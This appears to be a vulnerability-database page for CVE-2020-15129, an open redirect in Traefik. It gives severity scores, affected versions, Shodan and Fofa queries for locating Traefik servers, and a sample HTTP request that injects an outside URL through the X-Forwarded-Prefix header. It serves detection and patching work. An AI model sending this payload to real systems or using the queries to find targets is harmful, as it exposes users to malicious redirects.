🔙 목록으로 돌아가기

CVE-2020-15129: Traefik - Open Redirect

TitleTraefik - Open Redirect
Authordwisiswant0
SeverityMedium
ImpactAn attacker can manipulate the redirect URL and trick users into visiting malicious websites.
RemediationApply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik.
CVSS Score4.7
EPSS Score0.76842
CVE IDCVE-2020-15129
CWE IDCWE-601
Shodan Queryhttp.title:"traefik"
Fofa Querytitle="traefik"
Tags cve cve2020 traefik redirect vuln

🔍 Vulnerability Description

Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Connection: close
Accept: */*
Accept-Language: en
X-Forwarded-Prefix: https://foo.nl
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15129.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-15129.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A